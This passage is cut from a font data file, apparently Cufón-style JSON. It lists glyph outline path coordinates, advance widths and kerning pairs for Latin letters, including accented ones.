,-22,-56,-54,-56v-31,0,-53,20,-54,52r-76,0v0,-73,57,-121,130,-121","w":362},{"d":"359,-230r-292,0r0,-95r292,0r0,95","w":426},{"d":"201,0r-108,0r0,-712r108,0r0,712xm281,-781r-77,0r-111,-162r113,0","w":294},{"d":"383,-786r-285,860r-98,0r285,-860r98,0","w":380},{"d":"304,74r-218,0r0,-860r218,0r0,91r-116,0r0,678r116,0r0,91","w":347},{"d":"381,-608r-112,0r0,-104r112,-93r0,197xm190,-608r-112,0r0,-104r112,-93r0,197","w":459,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"J":120,"A":80}},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm482,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":625,"k":{"\u0152":5,"y":8,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"315,-513v143,0,181,91,181,259v0,168,-37,260,-180,260v-56,0,-100,-19,-133,-58r0,257r-102,0r0,-712r100,0r0,54v33,-40,78,-60,134,-60xm289,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":553},{"d":"281,-85v50,0,68,-19,97,-48r70,67v-45,48,-101,72,-167,72v-151,0,-226,-101,-226,-260v0,-159,74,-259,226,-259v67,0,122,24,167,71r-70,68v-29,-30,-47,-48,-97,-48v-87,0,-124,64,-124,168v0,106,36,169,124,169xm319,64r-51,147r-101,0r70,-147r82,0","w":488,"k":{"\u0153":17,"\u00e6":8,"o":17,"e":17,"c":8,"a":8}},{"d":"38,-513v0,-123,97,-199,225,-199r281,0r0,917r-102,0r0,-820r-108,0r0,820r-102,0r0,-522v-105,3,-194,-92,-194,-196","w":637},{"d":"922,0r-451,0r0,-58v-78,95,-254,77,-335,-10v-70,-75,-66,-134,-69,-288v-2,-133,5,-222,69,-288v83,-86,256,-105,335,-10r0,-58r450,0r0,96r-342,0r0,210r291,0r0,94r-291,0r0,216r343,0r0,96xm429,-135v63,-47,42,-275,34,-371v-9,-110,-173,-156,-245,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v50,60,161,58,211,0","w":977},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97xm447,-943r-111,162r-77,0r75,-162r113,0","w":603},{"d":"526,0r-126,0r-142,-234r-75,85r0,149r-102,0r0,-712r102,0r0,439r197,-234r124,0r-176,199","w":548,"k":{"\u0153":13,"\u00f6":13,"\u00f5":13,"\u00f4":13,"\u00f3":13,"\u00f2":13,"\u00eb":13,"\u00ea":13,"\u00e9":13,"\u00e8":13,"\u00e7":13,"\u00e6":13,"q":13,"o":13,"g":13,"e":13,"d":13,"c":13}},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm459,-943r-111,162r-77,0r75,-162r113,0","w":647,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm255,-908v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":647,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"201,0r-108,0r0,-712r108,0r0,712","w":294},{"d":"55,-366v0,-139,69,-236,183,-255r0,-91r80,0r0,90v54,7,101,31,141,74r-68,66v-25,-27,-52,-43,-82,-48r0,328v30,-5,57,-21,82,-48r68,66v-40,43,-87,67,-141,74r0,110r-80,0r0,-111v-114,-19,-183,-116,-183,-255xm247,-528v-121,20,-121,307,0,324r0,-324","w":498},{"d":"266,-718v116,0,208,81,208,197v0,67,-29,118,-86,153v65,39,98,95,98,167v0,124,-98,207,-220,207v-123,0,-219,-83,-219,-207v0,-72,33,-128,98,-167v-57,-35,-86,-86,-86,-153v0,-116,91,-197,207,-197xm266,-410v61,0,106,-47,106,-108v0,-61,-45,-109,-106,-109v-61,0,-105,48,-105,109v0,61,44,108,105,108xm266,-85v64,0,117,-53,117,-118v0,-65,-53,-119,-117,-119v-64,0,-117,54,-117,119v0,65,53,118,117,118"},{"d":"291,-398r-112,0r0,-109r112,0r0,109xm240,119v58,0,98,-44,98,-100r102,0v2,111,-89,192,-200,192v-110,0,-201,-80,-199,-192v1,-87,83,-169,125,-231v17,-25,19,-47,18,-84r102,0v12,116,-69,169,-112,240v-62,67,-25,175,66,175","w":511},{"d":"422,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":500},{"d":"897,0r-455,0r0,-162r-235,0r-84,162r-118,0r374,-712r518,0r0,97r-347,0r0,209r296,0r0,97r-296,0r0,212r347,0r0,97xm442,-254r0,-361r-188,361r188,0","w":952},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0xm325,-599r-77,0r-111,-162r113,0","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"183,0r-102,0r0,-507r102,0r0,507xm269,-599r-77,0r-111,-162r113,0","w":264},{"w":250},{"d":"267,-42r-230,-230r230,-229r0,123r-107,106r107,107r0,123","w":339},{"d":"441,-715v151,0,232,83,231,234r0,483r-96,-2r0,-50v-32,38,-74,57,-127,57v-126,0,-176,-90,-176,-241v0,-150,46,-241,175,-241v52,0,94,19,126,56v11,-125,-27,-206,-143,-206r-126,0v-91,0,-143,52,-142,145r0,312v1,62,13,79,50,110r-70,70v-56,-49,-79,-78,-79,-175r0,-318v-1,-152,79,-235,231,-234r146,0xm472,-80v85,0,102,-65,102,-154v0,-89,-17,-155,-102,-155v-85,0,-101,65,-101,155v0,90,16,154,101,154","w":736},{"d":"289,-474v136,2,187,95,190,236v4,155,-70,245,-210,245v-125,0,-198,-69,-206,-191r102,0v9,66,43,99,104,99v82,0,108,-55,108,-153v0,-99,-35,-149,-104,-149v-54,0,-88,21,-101,64r-93,0r0,-389r384,0r0,91r-292,0r0,188v26,-27,65,-41,118,-41"},{"w":166},{"d":"343,-712v194,2,265,135,256,351v-7,161,-7,218,-72,294v-82,95,-268,61,-434,67r0,-712r250,0xm453,-145v48,-55,37,-203,37,-307v0,-42,-16,-91,-37,-115v-50,-59,-150,-47,-252,-48r0,518v102,-2,201,10,252,-48","w":666,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":30,"A":10}},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0","w":625,"k":{"\u201d":80,"\u201c":80,"\u2019":80,"\u2018":80,"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"J":-8,"G":10,"C":10}},{"d":"256,-497v88,0,163,75,163,163v0,88,-75,163,-163,163v-88,0,-163,-75,-163,-163v0,-88,75,-163,163,-163","w":512},{"w":1000},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm464,-786r-92,0r0,-108r92,0r0,108xm248,-786r-92,0r0,-108r92,0r0,108","w":625,"k":{"\u0152":10,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"190,94v-75,-81,-104,-86,-104,-211r0,-478v5,-124,29,-130,104,-211r69,69v-38,37,-71,67,-71,148r0,466v-2,81,31,111,71,148","w":317},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113xm453,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":568},{"d":"190,0r-112,92r0,-197r112,0r0,105","w":267},{"d":"609,-521v11,52,10,283,-1,333v-22,106,-129,188,-249,188r-247,0r0,-318r-74,0r0,-83r74,0r0,-311r250,0v120,-6,225,87,247,191xm482,-159v45,-48,29,-251,22,-331v-7,-76,-75,-126,-155,-126r-129,0r0,215r138,0r0,83r-138,0r0,222v111,0,220,13,262,-63","w":684},{"d":"186,-607r-108,0r0,-108r108,0r0,108xm-19,120v57,3,100,1,100,-59r0,-568r102,0r0,574v0,83,-51,142,-139,140r-63,0r0,-87","w":264},{"d":"579,-356v0,124,-1,188,-46,259r70,69r-60,60r-71,-71v-118,88,-311,34,-370,-77v-47,-87,-34,-246,-31,-378v6,-218,299,-292,440,-148v62,63,68,158,68,286xm450,-180v26,-32,21,-269,13,-326v-14,-110,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v40,48,124,60,179,21r-75,-75r60,-60","w":646},{"w":200},{"d":"186,-91v84,0,129,-54,129,-142r0,-479r108,0r0,487v3,139,-102,232,-237,231v-69,0,-127,-23,-173,-69r72,-71v29,27,48,43,101,43","w":506,"k":{"A":10}},{"d":"487,-621r-238,621r-110,0r239,-621r-217,0r0,112r-98,0r0,-203r424,0r0,91"},{"d":"359,-230r-292,0r0,-95r292,0r0,95","w":426},{"w":55},{"d":"905,-231r-838,0r0,-97r838,0r0,97","w":972},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm361,-781r-77,0r-111,-162r113,0","w":625,"k":{"\u0152":5,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"266,-718v125,0,213,86,211,213v0,46,-18,104,-53,175r-162,330r-109,0r153,-306v-135,46,-250,-59,-250,-195v0,-127,86,-217,210,-217xm266,-380v68,0,109,-52,109,-123v0,-70,-42,-124,-109,-124v-67,0,-108,53,-108,124v0,69,40,123,108,123"},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113xm417,-761r-111,162r-77,0r75,-162r113,0","w":568},{"d":"539,-712r-213,419r0,293r-108,0r0,-293r-213,-419r118,0r149,313r149,-313r118,0xm408,-943r-111,162r-77,0r75,-162r113,0","w":544},{"d":"229,-716v114,0,169,77,169,206v0,130,-54,207,-169,207v-113,0,-168,-78,-168,-207v0,-129,55,-206,168,-206xm229,-377v69,0,85,-44,85,-133v0,-88,-16,-132,-85,-132v-67,0,-85,46,-85,132v1,87,17,133,85,133","w":458},{"d":"289,-624v-104,0,-170,108,-103,177v32,33,103,36,161,45v121,18,187,74,191,199v7,186,-226,247,-398,187v-40,-14,-77,-38,-110,-72r72,-71v45,45,106,68,182,68v84,1,145,-33,147,-109v3,-103,-100,-103,-190,-116v-112,-16,-186,-73,-187,-193v0,-130,101,-209,238,-209v89,0,163,27,221,81r-69,68v-39,-37,-90,-55,-155,-55","w":590,"k":{"Y":20,"S":10,"J":20}},{"d":"359,-230r-292,0r0,-95r292,0r0,95","w":426},{"d":"200,0r-122,0r0,-122r122,0r0,122","w":278},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154xm390,-781r-77,0r-111,-162r113,0","w":675},{"d":"735,-507r-158,507r-87,0r-119,-354r-118,354r-88,0r-157,-507r108,0r98,357r118,-357r79,0r117,357r98,-357r109,0","w":743,"k":{"\u0153":7,"\u00f8":7,"\u00f6":7,"\u00f5":7,"\u00f4":7,"\u00f3":7,"\u00f2":7,"\u00eb":7,"\u00ea":7,"\u00e9":7,"\u00e8":7,"\u00e7":7,"\u00e6":7,"o":7,"e":7,"c":7,".":46}},{"d":"266,-718v117,0,206,84,206,204r0,316v3,120,-89,204,-206,204v-116,0,-205,-84,-205,-204r0,-316v-3,-120,89,-204,205,-204xm266,-85v65,0,105,-50,104,-116r0,-310v1,-66,-39,-116,-104,-116v-66,0,-104,49,-103,116r0,310v-1,67,37,116,103,116"},{"w":200},{"d":"539,-712r-213,419r0,293r-108,0r0,-293r-213,-419r118,0r149,313r149,-313r118,0xm426,-786r-92,0r0,-108r92,0r0,108xm210,-786r-92,0r0,-108r92,0r0,108","w":544},{"d":"57,-263v0,-150,40,-250,179,-250v55,0,100,20,133,60r0,-54r99,0r0,504v1,127,-87,217,-217,214v-88,-1,-129,-22,-179,-67r65,-65v32,30,69,45,110,45v104,2,127,-84,119,-194v-33,39,-76,58,-131,58v-136,0,-178,-102,-178,-251xm263,-104v88,0,103,-71,103,-159v0,-88,-15,-158,-103,-159v-88,0,-104,71,-104,159v0,88,16,159,104,159","w":549},{"d":"190,-608r-112,0r0,-104r112,-93r0,197","w":268,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"s":60,"J":120,"A":80}},{"d":"721,0r-108,0r0,-476r-164,347r-80,0r-168,-347r0,476r-108,0r0,-712r108,0r208,443r204,-443r108,0r0,712","w":813},{"d":"482,-225r-168,0r0,168r-95,0r0,-168r-168,0r0,-95r168,0r0,-167r95,0r0,167r168,0r0,95"},{"d":"482,-230r-431,0r0,-95r431,0r0,95"},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm429,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":530},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0","w":646,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":35,"A":10}},{"d":"592,-513v151,1,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-54,51,-92,78,-189,79v-79,0,-137,-27,-175,-80v-35,53,-89,80,-163,80v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259v75,0,129,27,164,81v35,-54,89,-81,160,-81xm706,-295v-1,-81,-38,-130,-114,-133v-73,-3,-113,56,-114,133r228,0xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169","w":862},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97xm465,-786r-92,0r0,-108r92,0r0,108xm249,-786r-92,0r0,-108r92,0r0,108","w":603},{"w":333},{"d":"530,-615r-196,0r0,615r-108,0r0,-615r-196,0r0,-97r500,0r0,97","w":560,"k":{"\u0153":70,"\u0152":20,"\u00f8":70,"\u00e7":70,"\u00e6":70,"\u00d8":20,"\u00d6":20,"\u00d5":20,"\u00d4":20,"\u00d3":20,"\u00d2":20,"\u00c7":20,"\u00c6":60,"\u00c5":60,"\u00c4":60,"\u00c3":60,"\u00c2":60,"\u00c1":60,"\u00c0":60,"z":46,"y":46,"x":46,"w":46,"v":46,"u":46,"s":70,"r":46,"q":70,"p":46,"o":70,"n":46,"m":46,"g":70,"e":70,"d":70,"c":70,"a":70,"Q":20,"O":20,"J":80,"G":20,"C":20,"A":60,".":80}},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm422,-604r-92,0r0,-108r92,0r0,108xm206,-604r-92,0r0,-108r92,0r0,108","w":537,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"201,0r-108,0r0,-712r108,0r0,712xm437,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":294},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm404,-761r-111,162r-77,0r75,-162r113,0","w":537,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm310,-1000v68,0,125,58,125,125v0,68,-58,125,-125,125v-68,0,-125,-58,-125,-125v0,-68,58,-125,125,-125xm310,-812v34,0,64,-29,64,-63v0,-34,-30,-63,-64,-63v-34,0,-64,29,-64,63v0,34,30,63,64,63","w":625,"k":{"\u0152":5,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"183,0r-102,0r0,-507r102,0r0,507xm389,-604r-92,0r0,-108r92,0r0,108xm173,-604r-92,0r0,-108r92,0r0,108","w":264},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm477,-786r-92,0r0,-108r92,0r0,108xm261,-786r-92,0r0,-108r92,0r0,108","w":647,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"w":125},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113","w":568},{"d":"225,-285r-121,0r0,-122r121,0r0,122xm222,60r-116,95r0,-271r116,0r0,176","w":303},{"d":"504,-648v96,72,78,266,71,430v-3,74,-26,107,-64,148v-73,79,-200,99,-307,49r-31,65r-82,0r51,-108v-94,-73,-78,-266,-71,-430v8,-181,206,-272,372,-197r30,-65r83,0xm403,-599v-88,-55,-206,1,-219,93v-8,59,-12,312,12,340xm463,-206v8,-58,12,-314,-12,-340r-207,433v87,55,206,-1,219,-93","w":652},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113xm333,-599r-77,0r-111,-162r113,0","w":568},{"d":"235,-724v93,0,175,82,175,175v0,93,-82,174,-175,174v-93,0,-174,-81,-174,-174v0,-93,81,-175,174,-175xm235,-457v50,0,91,-42,91,-92v0,-50,-41,-93,-91,-93v-50,0,-90,43,-90,93v0,50,40,92,90,92","w":471},{"d":"548,-615r-347,0r0,217r296,0r0,97r-296,0r0,301r-108,0r0,-712r455,0r0,97","w":585,"k":{"\u0153":35,"\u0152":20,"\u00f8":35,"\u00e6":35,"\u00d8":20,"\u00d6":20,"\u00d5":20,"\u00d4":20,"\u00d3":20,"\u00d2":20,"\u00c7":20,"z":30,"x":30,"u":30,"r":30,"p":30,"o":35,"n":30,"m":30,"e":35,"c":35,"a":35,"S":10,"Q":20,"O":20,"J":130,"G":20,"C":20,"A":60,".":95}},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113xm435,-604r-92,0r0,-108r92,0r0,108xm219,-604r-92,0r0,-108r92,0r0,108","w":568},{"d":"54,-509v0,-121,87,-198,204,-207r0,-90r82,0r0,89v76,5,140,31,191,80r-69,68v-34,-32,-78,-50,-131,-54r0,216v135,13,225,66,225,204v0,124,-96,197,-216,206r0,111r-82,0r0,-108v-94,-4,-170,-35,-228,-94r72,-71v42,42,97,65,165,68r0,-222v-123,-8,-213,-70,-213,-196xm267,-622v-90,-3,-144,114,-81,175v19,18,46,28,81,33r0,-208xm331,-93v68,-5,117,-40,118,-107v1,-73,-50,-100,-118,-105r0,212","w":608},{"d":"57,-254v0,-168,38,-259,181,-259v56,0,101,20,134,60r0,-54r100,0r0,712r-102,0r0,-257v-33,39,-77,58,-133,58v-142,0,-180,-92,-180,-260xm265,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":553},{"d":"975,-277r-392,391r-131,0r345,-343r-745,0r0,-97r745,0r-345,-343r131,0","w":1027},{"d":"974,-229r-744,0r345,343r-131,0r-392,-391r392,-392r131,0r-345,343r744,0r0,97","w":1027},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97","w":603,"k":{"J":5}},{"w":1000},{"d":"464,-507r-224,608v-23,75,-81,108,-182,100r0,-92v59,2,83,-8,99,-54r28,-79r-177,-483r108,0r121,357r118,-357r109,0","w":468,"k":{"\u0153":10,"\u00f8":10,"\u00f6":10,"\u00f5":10,"\u00f4":10,"\u00f3":10,"\u00f2":10,"\u00eb":10,"\u00ea":10,"\u00e9":10,"\u00e8":10,"\u00e7":10,"\u00e6":10,"o":10,"e":10,"c":10,"a":10,".":65}},{"d":"268,6v-140,0,-207,-98,-207,-255v0,-142,47,-225,163,-247v27,-5,53,-4,76,2r-45,-81r-116,0r0,-72r78,0r-39,-70r108,0r39,70r87,0r0,72r-50,0v50,104,114,177,114,326v0,158,-67,255,-208,255xm268,-85v84,0,106,-58,106,-164v0,-107,-22,-164,-106,-164v-82,0,-105,58,-105,164v0,106,22,164,105,164","w":537},{"d":"261,74r-218,0r0,-90r118,0r0,-680r-118,0r0,-90r218,0r0,860","w":347},{"d":"355,0r-102,0r0,-601r-139,122r0,-113r139,-120r102,0r0,712"},{"d":"648,0r-127,0r-200,-351r-120,144r0,207r-108,0r0,-712r108,0r0,358r291,-358r132,0r-231,279","w":658,"k":{"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":34,"Q":10,"O":10,"J":-8,"G":10,"C":10}},{"d":"644,-368v80,0,140,55,140,137r0,101v2,82,-60,137,-140,137v-80,0,-140,-55,-140,-137r0,-101v-2,-82,60,-137,140,-137xm629,-712r-335,712r-82,0r336,-712r81,0xm198,-719v80,0,140,55,140,137r0,101v2,82,-60,136,-140,136v-80,0,-140,-54,-140,-136r0,-101v-2,-82,60,-137,140,-137xm644,-61v78,0,62,-93,63,-167v0,-48,-21,-72,-63,-72v-78,0,-62,93,-63,167v0,48,21,72,63,72xm198,-413v78,0,62,-92,63,-166v0,-48,-21,-72,-63,-72v-78,0,-62,93,-63,167v0,47,21,71,63,71","w":842},{"d":"323,-91v104,-1,165,-80,152,-202r-152,0r0,-92r260,0r0,109v5,177,-104,282,-260,282v-152,0,-264,-107,-255,-285r0,-154v-8,-175,101,-283,255,-285v145,-2,239,96,259,221r-109,0v-17,-73,-65,-123,-150,-124v-72,-1,-125,49,-139,115v-9,46,-9,254,0,300v14,67,65,116,139,115","w":649,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":35,"A":10}},{"d":"183,0r-102,0r0,-507r102,0r0,507xm425,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":264},{"d":"539,-712r-213,419r0,293r-108,0r0,-293r-213,-419r118,0r149,313r149,-313r118,0","w":544,"k":{"\u0153":80,"\u0152":10,"\u00f8":80,"\u00e7":80,"\u00e6":80,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":40,"\u00c5":40,"\u00c4":40,"\u00c3":40,"\u00c2":40,"\u00c1":40,"\u00c0":40,"z":40,"x":40,"u":40,"s":80,"r":40,"q":80,"p":40,"o":80,"n":40,"m":40,"g":80,"e":80,"d":80,"c":80,"a":80,"Q":10,"O":10,"J":40,"G":10,"C":10,"A":40,".":80}},{"d":"590,-504v0,100,-62,168,-142,189r164,315r-126,0r-150,-300r-135,0r0,300r-108,0r0,-712r276,0v128,-3,221,84,221,208xm361,-392v71,1,121,-41,121,-111v0,-70,-50,-113,-121,-112r-160,0r0,223r160,0","w":655,"k":{"J":16}},{"d":"363,-712v131,-3,228,89,228,216v0,127,-97,216,-228,216r-162,0r0,280r-108,0r0,-712r270,0xm357,-378v74,1,126,-44,126,-118v0,-74,-52,-120,-126,-119r-156,0r0,237r156,0","w":629,"k":{"\u0153":10,"\u00f8":10,"\u00e7":10,"\u00e6":10,"\u00c6":50,"\u00c5":50,"\u00c4":50,"\u00c3":50,"\u00c2":50,"\u00c1":50,"\u00c0":50,"s":10,"q":10,"o":10,"g":10,"e":10,"d":10,"c":10,"a":10,"J":120,"A":50,".":110}},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm309,-599r-77,0r-111,-162r113,0","w":530},{"d":"316,-513v110,0,176,74,176,189r0,324r-102,0r0,-309v1,-71,-36,-113,-102,-113v-65,0,-105,43,-105,113r0,309r-102,0r0,-507r100,0r0,51v35,-38,80,-57,135,-57xm219,-726v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":568},{"d":"316,-513v142,0,180,92,180,259v0,168,-37,260,-180,260v-56,0,-100,-19,-133,-58r0,257r-102,0r0,-917r102,0r0,256v32,-38,76,-57,133,-57xm289,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":554},{"d":"498,-107r-76,0r0,107r-99,0r0,-107r-288,0r0,-95r251,-510r110,0r-250,510r177,0r0,-166r99,0r0,166r76,0r0,95"},{"w":500},{"d":"227,-406v135,-46,250,59,250,195v0,127,-86,217,-210,217v-125,0,-213,-86,-211,-213v0,-46,18,-104,53,-175r162,-330r109,0xm266,-85v67,1,109,-54,109,-124v0,-69,-41,-123,-109,-123v-68,0,-108,52,-108,123v0,71,41,124,108,124"},{"d":"381,0r-112,92r0,-197r112,0r0,105xm190,0r-112,92r0,-197r112,0r0,105","w":460,"k":{"Y":100,"W":50,"V":80,"T":100}},{"d":"571,172r-571,0r0,-70r571,0r0,70","w":571},{"d":"343,-621v-84,0,-129,54,-129,142r0,88r129,0r0,78r-129,0r0,216r302,0r0,97r-411,0r0,-313r-62,0r0,-78r62,0r0,-96v-3,-139,103,-232,238,-231v69,0,127,23,173,69r-72,71v-29,-27,-48,-43,-101,-43","w":564},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm200,-726v38,0,94,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":537,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm241,-908v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":625,"k":{"\u0152":5,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"204,-285r-77,0r0,-341r-87,76r0,-87r87,-75r77,0r0,427","w":277},{"d":"556,-272r-231,230r0,-123r107,-107r-107,-106r0,-123xm303,-272r-231,230r0,-123r108,-107r-108,-106r0,-123","w":592},{"d":"281,-85v65,0,104,-43,104,-113r0,-309r102,0r0,507r-100